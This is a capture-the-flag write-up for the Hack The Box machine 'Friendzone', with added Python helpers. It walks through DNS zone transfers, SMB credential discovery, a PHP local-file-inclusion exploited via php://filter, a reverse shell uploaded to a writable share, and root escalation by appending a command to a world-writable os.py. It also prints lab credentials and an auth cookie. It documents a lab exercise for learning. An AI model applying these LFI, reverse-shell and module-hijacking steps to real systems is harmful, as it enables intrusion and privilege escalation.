Hack The Box - Friendzone write-up

Let's get started with nmap -
nmap -sC -sV -v 10.10.10.123
Here -sC runs the default NSE scripts and -sV probes each open port for its service version. We get the following result from nmap -





Since ports 80 and 443 are open, let's try these first with a quick look through the browser. Visiting http://10.10.10.123 directly, we are greeted with this page -



If you notice, there is an email address on this page, info@friendzoneportal.red, so friendzoneportal.red could be a valid virtual host name. Let's note it down and continue recon on port 80.
If we request the very common URL http://10.10.10.123/robots.txt we are trolled by the creator of the machine with this text -
seriously ?!
Let's start dirb in the background to look for other hidden pages -
dirb http://10.10.10.123
Unfortunately, dirb does not turn up anything useful. Let's move on to the HTTPS service.
When we visit https://10.10.10.123 the browser warns about the certificate supplied by the server. Viewing the TLS certificate is always worth a moment: the Subject and Subject Alternative Name fields frequently leak hostnames the server expects to be reached by.





Here we got one more domain, friendzone.red. Let's add both domains to our local /etc/hosts file so we can browse to them by name. The hosts file entry should look like this -
10.10.10.123 friendzone.red friendzoneportal.red



Upon visiting https://friendzone.red we are again greeted with this page -



Upon viewing the source code, I found something interesting -
<title>FriendZone escape software</title>

<br>
<br>


<center><h2>Ready to escape from friend zone !</h2></center>


<center><img src="e.gif"></center>





Now obviously we visit the location hinted at in the HTML comment (it points to /js/js) :D . Upon visiting https://friendzone.red/js/js/ and viewing the source code we find this -

<p>Testing some functions !</p><p>I'am trying not to break things !</p>ck43TzFCaExaczE1NjMxNzMzMjNXYW8wSkZkSzBl

After spending a good amount of time on this URL I gave up and moved on to the other domain; later I found out this was indeed a rabbit hole. :-/

Let's visit https://friendzoneportal.red/ , we get this page -



I ran dirb against this domain with various wordlists but didn't find anything useful.
Since I had already lost a good amount of time on ports 80 & 443, I moved on to enumerating SMB, as ports 139 & 445 were open. Nmap ships with very powerful NSE scripts for enumerating many different services. I used this script to enumerate the SMB shares -
nmap --script smb-enum-shares.nse -p445 10.10.10.123
And here are the results! -



We can see several SMB shares, and we have permission to read and even write to some of them.

A quick way to look at the files on a share is -
smbclient //<server ip>/<share name>
But if you want to browse many files or write files to the share, it is more convenient to mount it.

In Kali Linux you can do this quickly by opening the file manager, clicking Other Locations, and entering an address in the Connect to Server box at the bottom.
Enter smb://10.10.10.123/general/ as the location and, when prompted for credentials, connect anonymously.





We only get one file here, named creds.txt, containing this text -
creds for the admin THING:

admin:WORKWORKHhallelujah@#

So we have credentials but don't yet know where to use them!
Let's check the Development share in the same way.
One interesting thing about this share is that we can upload new files and modify existing ones! Here I have written a file named yashpl.me -



We don't have any permission for other SMB shares, so let's move on to other services!

This box also has port 53 open with a DNS service on it. That really stands out in a CTF environment, as most machines don't require any DNS resolution at all!

I enumerated port 53 with nslookup, setting the server to 10.10.10.123 so that our queries are answered by the box itself, and tried various queries - localhost, 127.0.0.1, friendzoneportal.red and friendzone.red -



I did not get any useful information, but then it struck me that nmap's default scan is TCP-only, so what we are looking at is a name server listening on TCP. Ordinary lookups travel over UDP; a name server answers on TCP for replies that do not fit in a UDP datagram and, above all, for zone transfers (AXFR), which are always carried over TCP. So let's try to transfer the zones for both domains from this box!
I used dig to dig up some information, pun intended! :P
dig axfr friendzoneportal.red @10.10.10.123
dig axfr friendzone.red @10.10.10.123
Lo and Behold, we got a lot of subdomains from both virtual domains! - 
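To turn a transfer like this into something usable, here is a small added helper (my code, not part of the original write-up) that parses dig axfr output, collects the owner names of A/AAAA/CNAME records and prints a single /etc/hosts line pointing all of them at the box. The sample output embedded below is constructed for this example: it uses only the hostnames that appear in this write-up, and its record data (the SOA, NS and 127.0.0.1 addresses) is illustrative, not copied from the machine. Because zone data on CTF boxes often points at loopback or an internal address, the hosts line maps every name to the IP you actually scan rather than to the A record's address.

```python
import re
import sys

# Constructed sample of `dig axfr friendzone.red @10.10.10.123` output, built for
# this example. Only hostnames from the write-up are used; the SOA/NS data and
# the 127.0.0.1 addresses are illustrative, not copied from the box.
SAMPLE_AXFR = """\
; <<>> DiG 9.11.5 <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.\t\t604800\tIN\tNS\tlocalhost.
friendzone.red.\t\t604800\tIN\tA\t127.0.0.1
administrator1.friendzone.red.\t604800\tIN\tA\t127.0.0.1
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 30 msec
"""

# dig prints one record per line: <owner> <ttl> IN <type> <rdata>
RR_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z0-9]+)\s+(?P<rdata>.+)$")


def parse_axfr(text):
    """Yield (owner, type, rdata) for every resource record in dig axfr output.

    Comment lines (';'), blanks and anything that is not a record are skipped.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            yield m["name"].rstrip("."), m["type"], m["rdata"].strip()


def hostnames_from_axfr(text, types=("A", "AAAA", "CNAME")):
    """Owner names of address-type records, de-duplicated, in zone order."""
    names = []
    for name, rtype, _ in parse_axfr(text):
        if rtype in types and name not in names:
            names.append(name)
    return names


def hosts_line(target_ip, names):
    """Build one /etc/hosts line mapping every name to the IP we actually reach.

    CTF zones often point A records at 127.0.0.1 or an internal address, so the
    address inside the zone is deliberately ignored here.
    """
    if not names:
        return ""
    return f"{target_ip} {' '.join(names)}"


if __name__ == "__main__":
    # Pipe dig output in, or run without input to see the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AXFR
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.123"
    print(hosts_line(target, hostnames_from_axfr(text)))
```

Saved as, say, axfr2hosts.py (a name I am making up), it chains naturally: dig axfr friendzone.red @10.10.10.123 | python3 axfr2hosts.py 10.10.10.123 | sudo tee -a /etc/hosts. Run it once per zone you transferred.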



There are a lot of hostnames here and most of them were trolls / rabbit holes from the creator of this machine, which again wasted a lot of time. Without wasting any more of yours, let's jump to the one that matters and enumerate https://administrator1.friendzone.red/.
First, add this hostname to /etc/hosts (pointing at 10.10.10.123), then open it in the browser, and here we get a login page!



Remember the credentials we found on the SMB share? This is where we use them! After logging in we get a page saying -

Login Done ! visit /dashboard.php

Visiting dashboard.php gives us this message -



Let's add these parameters to the URL and visit - https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp



My first thought was to check both parameters for LFI. image_id was only reflected into the page source, but pagename was actually being passed to an include.

Let's pass the request through Burp for more control and try to exploit the LFI.



I tried various payloads and wordlists but could not get a single file back, as you can see in the image above.
That pointed at how dashboard.php builds the include. Instead of including the parameter directly, like this -
include($_GET['pagename']);
the code probably appends an extension, like this -
include($_GET['pagename'].".php");
in which case only files ending in .php can ever be included (modern PHP no longer truncates paths at a null byte, so the old %00 trick does not help either).
To confirm this, I used a PHP stream filter to read dashboard.php itself, base64-encoded so the PHP code comes back as text instead of being executed. Note that the resource is given without an extension, because the script adds .php for us -
pagename=php://filter/convert.base64-encode/resource=dashboard
And here we got the base64-encoded source of dashboard.php. Burp Suite's Decoder tab will decode it.
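Here is an added Python helper (mine, not from the original write-up) that automates this step: it builds the php://filter URL for a script name given without its extension, mirroring the include($_GET["pagename"].".php") on the target, pulls the longest base64 run out of the response and decodes it. The response used in the demo is constructed inline so the decoder runs offline; the fetch function is included for live use and sends the FriendZoneAuth cookie the login sets, with certificate verification disabled because the box presents a self-signed certificate.

```python
import base64
import re
from urllib.parse import urlencode


def filter_payload(script_basename):
    """php://filter wrapper that returns a file's bytes base64-encoded instead of executing them.

    The target does include($_GET["pagename"].".php"), so the resource is given
    WITHOUT its .php extension; PHP appends it for us.
    """
    return f"php://filter/convert.base64-encode/resource={script_basename}"


def dashboard_url(host, script_basename, image_id="a.jpg"):
    """Full dashboard.php URL; image_id must be present or the include branch is never reached."""
    query = urlencode({"image_id": image_id, "pagename": filter_payload(script_basename)}, safe=":/=")
    return f"https://{host}/dashboard.php?{query}"


# A base64 blob is a long run of the alphabet with optional '=' padding; the page
# text around it ("FriendZone Admin !", the error messages) never forms such a run.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_php_source(response_body):
    """Pull the longest base64 run out of the HTML response and decode it to PHP source."""
    runs = B64_RE.findall(response_body)
    if not runs:
        raise ValueError("no base64 blob in response: wrong cookie, wrong script name, or filter blocked")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)  # tolerate padding lost to HTML trimming
    return base64.b64decode(blob, validate=True).decode("utf-8", "replace")


def fetch_source(host, script_basename, cookie_value, timeout=10):
    """Live variant: request the filter URL with the FriendZoneAuth cookie and decode the reply."""
    import ssl
    import urllib.request
    ctx = ssl._create_unverified_context()  # the box presents a self-signed certificate
    req = urllib.request.Request(dashboard_url(host, script_basename),
                                 headers={"Cookie": f"FriendZoneAuth={cookie_value}"})
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return extract_php_source(resp.read().decode("utf-8", "replace"))


# Constructed stand-in for the dashboard's reply, so the decoder can be exercised offline.
CONSTRUCTED_SOURCE = '<?php\ninclude($_GET["pagename"].".php");\n'
CONSTRUCTED_RESPONSE = (
    "FriendZone Admin ! Something went worng ! , the script include wrong param ! "
    + base64.b64encode(CONSTRUCTED_SOURCE.encode()).decode()
)

if __name__ == "__main__":
    print(dashboard_url("administrator1.friendzone.red", "dashboard"))
    print(extract_php_source(CONSTRUCTED_RESPONSE))
```

Against the live box you would call fetch_source("administrator1.friendzone.red", "dashboard", cookie) with the cookie value copied from your logged-in browser session; the same call with "login" or "timestamp" reads the other scripts, since they all sit next to dashboard.php and the include appends .php to whatever name you pass.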




Decoded, and with the HTML markup that wrapped these strings left out, the source is -

<?php
//echo "Smart photo script for friendzone corp !";
//echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";

echo "FriendZone Admin !";

$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
    echo " ";
    echo "Smart photo script for friendzone corp !";
    echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";

    if(!isset($_GET["image_id"])){
        echo " ";
        echo "image_name param is missed !";
        echo "please enter it to show the image";
        echo "default is image_id=a.jpg&pagename=timestamp";
    }else{
        $image = $_GET["image_id"];
        echo "";                                   // reflects $image into the page (markup stripped)
        echo "Something went worng ! , the script include wrong param !";
        include($_GET["pagename"].".php");         // the LFI: attacker-controlled path + ".php"
        //echo $_GET["pagename"];
    }
}else{
    echo "You can't see the content ! , please login !";
}

As the include statement shows, we have an LFI, but only for files ending in .php. Also worth noting: authentication is nothing more than a comparison of the FriendZoneAuth cookie against a hard-coded value, so anyone who knows that string can skip the login page entirely.
Looking back, we found an SMB share we can write to (Development), and the NSE enumeration told us where it lives on disk: /etc/Development.

So if we upload a PHP shell to the Development share and pass its path (without the .php extension) as pagename to dashboard.php, we get code execution!
Let's upload a stock PHP reverse shell, edited with my IP & port number, to the SMB share -



Then start a listener -
nc -lvnp 9000
Then, in Burp, point pagename at our uploaded shell to trigger it -



And we popped a shell!! :)



This is a low-privilege shell as www-data, but we can already read user.txt, as the output of wc user.txt shows.

wc prints line, word and byte counts; the 33 is the byte count: a 32-character flag plus the trailing newline.
Let's upgrade to a proper TTY with these commands -
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
# hit Ctrl-Z

# In Kali / host machine
$ stty raw -echo
$ fg

# In reverse shell

$ export SHELL=bash
$ export TERM=xterm-256color
$ reset

I checked the usual locations and in /var/www found a file mysql_data.conf with these credentials -

for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

Credential reuse is common, so I tried logging in as the friend user with the db_pass value as the password, and it worked!



This turned out to be a sideways move rather than an escalation: friend has no more privileges than www-data, so we could just as well continue as www-data.

Next I switched to enumerating the processes running on the box with pspy (DominicBreuker/pspy on GitHub).

I uploaded a statically linked build of the tool to the SMB share and copied it to /dev/shm, since we cannot make uploaded files executable inside /etc/Development.
Then we run it -



I saw root periodically running a script: /bin/sh -c /opt/server_admin/reporter.py.
On inspection it was just a dummy script that did nothing besides import the os module.



Since I can't edit that script, the next thing to check is whether Python's library directory, or any module the script imports, is writable. If so, we can hijack os.py: Python runs a module's top-level code when it is imported, so anything appended to os.py executes with the privileges of whoever imports it, here root.
I checked the permissions on os.py and YES, it is world-writable!!
www-data@FriendZone:/$ ls -al /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 22:19 /usr/lib/python2.7/os.py
I appended this line -
system("cp /root/root.txt /etc/Development/yashpl; chmod 777 /etc/Development/yashpl")
to the end of /usr/lib/python2.7/os.py (system is available unqualified there because os.py pulls it in from the posix module) and waited for root to run the script again.
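The ls -al check above generalizes into a quick audit. The Python below is an added example (mine, not from the write-up or the box): given a script that a privileged job runs, it lists the top-level modules the script imports, resolves each to the file Python would actually load, and flags any whose file or containing directory is group- or world-writable. It deliberately checks mode bits rather than os.access(), so the result is meaningful even when you run it as root. The fixture (module names loosemod and tightmod, and a reporter.py that imports them) is constructed in a temporary directory for demonstration; pointing the script at /opt/server_admin/reporter.py on the box, using the same interpreter the cron job uses, is how you would reproduce the finding.

```python
import ast
import importlib.machinery
import os
import stat
import tempfile


def imported_modules(script_path):
    """Top-level module names a script imports via `import x` or `from x import y`."""
    with open(script_path, "rb") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def resolve_module_file(name, search_path=None):
    """File that `import name` would load, or None for built-ins (sys, posix, ...).

    search_path=None means this interpreter's sys.path, so run the audit with the
    same interpreter the privileged job uses (python2.7 on the box, for os.py).
    """
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or not spec.has_location or not spec.origin:
        return None
    return spec.origin


def hijackable(path):
    """True when the module file or its directory is group- or world-writable.

    Mode bits are checked instead of os.access() so the answer does not change
    when the audit itself happens to run as root.
    """
    loose = stat.S_IWGRP | stat.S_IWOTH
    return any(os.stat(p).st_mode & loose for p in (path, os.path.dirname(path)))


def writable_imports(script_path, search_path=None):
    """Map module name -> file for every import of script_path that could be hijacked."""
    findings = {}
    for name in imported_modules(script_path):
        path = resolve_module_file(name, search_path)
        if path and hijackable(path):
            findings[name] = path
    return findings


def build_demo_fixture():
    """Constructed fixture (not from the box): a reporter.py importing one world-writable
    module (loosemod, mode 666) and one sane module (tightmod, mode 644)."""
    d = tempfile.mkdtemp()  # created 0700, so the directory itself is not the weak spot
    for name, mode in (("loosemod", 0o666), ("tightmod", 0o644)):
        p = os.path.join(d, name + ".py")
        with open(p, "w") as fh:
            fh.write("thing = 1\n")
        os.chmod(p, mode)
    script = os.path.join(d, "reporter.py")
    with open(script, "w") as fh:
        fh.write("import os\nimport loosemod\nfrom tightmod import thing\n")
    return script, d


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # e.g. /opt/server_admin/reporter.py
        findings = writable_imports(sys.argv[1])
    else:
        script, d = build_demo_fixture()
        findings = writable_imports(script, [d])
    for name, path in findings.items():
        print(f"hijackable: import {name} -> {path}")
```

Two caveats when using this for real: the resolution follows the auditing interpreter's sys.path, so a python3 run will not see python2.7's os.py unless you pass that library directory as search_path; and a writable directory is as bad as a writable file, because an attacker can drop a same-named module earlier on the path or replace the file outright.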
And Finally, we have our root flag! -